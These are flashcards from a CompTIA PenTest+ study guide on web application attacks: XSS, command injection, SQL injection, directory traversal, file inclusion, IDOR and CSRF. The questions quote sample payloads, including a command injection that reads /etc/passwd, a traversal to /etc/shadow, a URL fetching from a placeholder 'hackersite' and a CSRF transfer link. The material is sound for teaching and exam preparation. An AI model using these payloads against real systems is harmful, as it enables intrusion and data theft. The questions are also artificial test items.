CompTIA Pentest+ for Dummies Chapter 7 Prep Test Flashcards
You are authorized to perform an assessment on the company Intranet site that is used by employees within the company. There is a message board in the application. Which of the following would you use to attempt a cross-site scripting attack?
A. http://site/board.php?m=hello;phpinfo()
B. http://site/board.php?dir=%3Bcat%20/etc/passwd
C. http://site/board.php?m=Lunch%20Time!&m=Lunch%20Time' or 1=1 --
D. http://site/board.php?m=<script>alert("hello");</script>
D. http://site/board.php?m=<script>alert("hello");</script>
Explanation:
With a cross-site scripting attack, you are submitting script code as input, so watching for a script block containing actual JavaScript helps find the answer.
You are performing a pentest on a PHP website. What HTTP request would you use to perform a command injection attack?
A. http://site/board.php?m=hello;phpinfo()
B. http://site/board.php?dir=%3Bcat%20/etc/passwd
C. http://site/board.php?m=Lunch%20Time!&m=Lunch%20Time' or 1=1 --
D. http://site/board.php?m=<script>alert("hello");</script>
B. http://site/board.php?dir=%3Bcat%20/etc/passwd
Explanation:
A command injection attack has a reference to an OS command within the URL parameter list.
In this case, the cat command is called to try to display the contents of the password file.
You are assessing an application that is storing data in a database.
What HTTP request would you send that would be the quickest way to determine if SQL injection attacks may be successful on the site?
A. http://site/board.php?m=hello;phpinfo()
B. http://site/board.php?dir=%3Bcat%20/etc/passwd
C. http://site/board.php?m=Lunchtime!'
D. http://site/board.php?m=<script>alert("hello");</script>
C. http://site/board.php?m=Lunchtime!'
Explanation:
A quick way to test whether the developer is validating input and stopping SQL injection is to simply add an apostrophe to the end of the URL.
If the developer is not validating input, the apostrophe is passed to the database server, but the quotes are now mismatched, so it causes an error and does not execute on the database server.
Although the query did not execute, the error tells you that the input was passed to the database, which means the programmer is not validating input.
What type of XSS attack stores the malicious input in a database to be processed by a visitor to the site at a later time?
A. Persistent XSS
B. DOM XSS
C. Non-persistent XSS
D. Reflected XSS
A. Persistent XSS
Explanation:
Persistent XSS, or stored XSS, involves storing the inputted data in a database so that it is processed and executed when a user views the page.
You are monitoring the log files for your web server and see the following type of GET request appear many times in the log:
http://www.website.com/../../../etc/shadow
A. Persistent XSS
B. Directory Traversal
C. SQL Injection
D. Command Injection
B. Directory Traversal
Explanation:
Directory traversal, also known as folder traversal, is when you navigate the file system of the web server and access files using the URL.
Which of the following commands would you use to perform a local file inclusion attack?
A. http://site/board.php?include=c:\data\program.exe
B. http://site/board.php?include=http://hackersite/program.exe
C. http://site/board.php?m=Lunchtime!'+
D. http://site/board.php?m=<script>alert("hello");</script>
A. http://site/board.php?include=c:\data\program.exe
Explanation:
Performing a local file inclusion attack allows you to run program code you planted on the web server simply by referencing it in the URL.
You are performing a pentest for Company XYZ and the Intranet server for the HR department is in the scope of the pentest.
You were set up as an employee and given logon credentials to the website.
While looking at your record, you change the “120” in the URL to “121”:
http://intranetsite/emprecord.php?eid=120
What type of attack is occurring?
A. Parameter Pollution
B. Persistent XSS
C. Directory Traversal
D. Insecure Direct Object Reference
D. Insecure Direct Object Reference
Explanation:
Insecure Direct Object Reference (IDOR) is when you modify the parameter data in the URL of the request message and are able to access another object or record through the website.
You have determined that a company’s website is vulnerable to SQL injection attacks.
Which of the following would you recommend to help protect against SQL injections?
A. Use HTTPS instead of HTTP
B. Disable cookie usage
C. Use parameterized queries
D. Enable error handling
C. Use parameterized queries
Explanation:
In addition to incorporating validation logic, you should always use parameterized queries or stored procedures to execute any database logic.
The stored procedure uses parameters and may also contain validation logic.
You are testing a web application against SQL injection attacks and find that the error messages are giving details about the database environment. What could you do to eliminate this?
A. Use HTTPS instead of HTTP
B. Implement Error Handling
C. Review the Log File
D. Change the database name
B. Implement Error Handling
Explanation:
It is important that developers implement error handling within their application to trap the errors and show friendly error messages that do not give details on the environment.
What type of XSS attack does not store the malicious input in a database and simply processes the information for output right away?
A. Persistent XSS
B. DOM XSS
C. Stored XSS
D. Reflected XSS
D. Reflected XSS
Explanation:
Reflected XSS is also known as non-persistent XSS because the input is not stored in a database; it is processed by the server right away and reflected back in the response.
Bob has received an email from the government stating that he has overpaid his taxes last year.
When Bob looked at the HTML code for the email, he noticed the following code:
<A href="https://www.mybank.com/account/etransfer?to=hacker@hacker.com&amount=1000">Collect Tax Refund</A>
A. Persistent XSS
B. Credential Harvesting
C. CSRF
D. Reflected XSS
C. CSRF
Explanation:
Looking at the HTML code, you can see that the code is sending a request for the etransfer functionality of the bank site and passing in parameters to populate who to send the etransfer to and how much money to transfer.
This is an example of a cross-site request forgery attack.